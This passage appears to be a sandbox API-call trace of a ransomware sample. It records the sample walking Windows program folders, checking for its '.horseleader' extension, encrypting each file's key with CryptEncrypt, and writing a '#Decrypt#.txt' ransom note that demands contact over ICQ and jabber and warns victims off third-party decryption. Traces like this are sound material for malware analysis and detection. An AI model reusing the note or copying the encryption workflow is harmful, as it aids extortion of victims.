ftLastWriteTime.dwLowDateTime=0x4faf2107, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x135b, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationUp_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.815] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.815] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationUp_ButtonGraphic.png") returned 86 [0251.815] StrStrIW (lpFirst="NavigationUp_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.815] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.815] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.815] lstrlenW (lpString=".testttjffg") returned 11 [0251.815] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationUp_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.815] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.815] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.815] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.815] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ffbb7e8, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ffbb7e8, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4faf2107, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc09, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationUp_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.815] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.815] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationUp_SelectionSubpicture.png") returned 92 [0251.816] StrStrIW (lpFirst="NavigationUp_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.816] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.816] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.816] lstrlenW (lpString=".testttjffg") returned 11 [0251.816] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationUp_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.816] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.816] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.816] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.816] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ff23274, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ff23274, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4faf2107, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x547b, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="shatter.png", cAlternateFileName="")) returned 1 [0251.816] lstrcmpiW (lpString1="shatter.png", lpString2="Windows") returned -1 [0251.816] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\shatter.png") returned 67 [0251.816] StrStrIW (lpFirst="shatter.png", lpSrch=".horseleader") returned 0x0 [0251.816] lstrcmpW (lpString1="shatter.png", lpString2="#Decrypt#.txt") returned 1 [0251.816] lstrcmpW (lpString1="shatter.png", lpString2="_uninstalling_.png") returned 1 [0251.816] lstrlenW (lpString=".testttjffg") returned 11 [0251.816] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\shatter.png", lpSrch=".testttjffg") returned 0x0 [0251.816] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.816] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.817] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\shatter.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\shatter.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.817] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ff23274, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ff23274, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4faf2107, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x547b, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="shatter.png", cAlternateFileName="")) returned 0 [0251.817] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0251.818] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\#Decrypt#.txt") returned 69 [0251.818] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\#Decrypt#.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0251.820] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0251.820] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0251.821] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0251.821] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0251.821] CloseHandle (hObject=0x158) returned 1 [0251.821] GetProcessHeap () returned 0x780000 [0251.821] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0251.821] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1a65ec8, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa92ba2a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1ad8615, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="SpecialOccasion", cAlternateFileName="SPECIA~1")) returned 1 [0251.821] lstrcmpiW (lpString1="SpecialOccasion", lpString2="Windows") returned -1 [0251.821] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion") returned 63 [0251.821] lstrcmpW (lpString1="SpecialOccasion", lpString2=".") returned 1 [0251.821] lstrcmpW (lpString1="SpecialOccasion", lpString2="..") returned 1 [0251.822] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.822] GetProcessHeap () returned 0x780000 [0251.822] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0251.822] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\*") returned 65 [0251.822] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1a65ec8, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa92ba2a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1ad8615, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0251.824] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.824] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\.") returned 65 [0251.824] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.824] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1a65ec8, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa92ba2a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1ad8615, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="..", cAlternateFileName="")) returned 1 [0251.824] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.824] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\..") returned 66 [0251.824] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.824] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.824] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f446eef, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f446eef, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4fc22bf7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11da, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="1047x576black.png", cAlternateFileName="")) returned 1 [0251.824] lstrcmpiW (lpString1="1047x576black.png", lpString2="Windows") returned -1 [0251.825] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\1047x576black.png") returned 81 [0251.825] StrStrIW (lpFirst="1047x576black.png", lpSrch=".horseleader") returned 0x0 [0251.825] lstrcmpW (lpString1="1047x576black.png", lpString2="#Decrypt#.txt") returned 1 [0251.825] lstrcmpW (lpString1="1047x576black.png", lpString2="_uninstalling_.png") returned 1 [0251.825] lstrlenW (lpString=".testttjffg") returned 11 [0251.825] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\1047x576black.png", lpSrch=".testttjffg") returned 0x0 [0251.825] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.825] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.825] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\1047x576black.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.825] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f4df463, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f4df463, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4fc22bf7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xca59, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="mainscroll.png", cAlternateFileName="")) returned 1 [0251.825] lstrcmpiW (lpString1="mainscroll.png", lpString2="Windows") returned -1 [0251.825] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\mainscroll.png") returned 78 [0251.826] StrStrIW (lpFirst="mainscroll.png", lpSrch=".horseleader") returned 0x0 [0251.826] lstrcmpW (lpString1="mainscroll.png", lpString2="#Decrypt#.txt") returned 1 [0251.826] lstrcmpW (lpString1="mainscroll.png", lpString2="_uninstalling_.png") returned 1 [0251.826] lstrlenW (lpString=".testttjffg") returned 11 [0251.826] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\mainscroll.png", lpSrch=".testttjffg") returned 0x0 [0251.826] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.826] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.826] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\mainscroll.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\mainscroll.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.827] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f5e9dee, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f5e9dee, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4fc22bf7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13e0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationLeft_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.827] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.827] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationLeft_ButtonGraphic.png") returned 96 [0251.827] StrStrIW (lpFirst="NavigationLeft_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.827] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.827] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.827] lstrlenW (lpString=".testttjffg") returned 11 [0251.827] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationLeft_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.827] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.828] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.828] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.828] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f60ff4b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f60ff4b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4fc95011, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc3a, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationLeft_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.828] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.828] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationLeft_SelectionSubpicture.png") returned 102 [0251.828] StrStrIW (lpFirst="NavigationLeft_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.828] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.828] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.828] lstrlenW (lpString=".testttjffg") returned 11 [0251.828] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationLeft_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.828] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.828] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.828] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.828] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f60ff4b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f60ff4b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4fd536e7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13a1, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationRight_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.829] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.829] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationRight_ButtonGraphic.png") returned 97 [0251.829] StrStrIW (lpFirst="NavigationRight_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.829] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.829] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.829] lstrlenW (lpString=".testttjffg") returned 11 [0251.829] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationRight_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.829] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.829] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.829] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.829] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f6360a8, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f6360a8, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4fd536e7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, 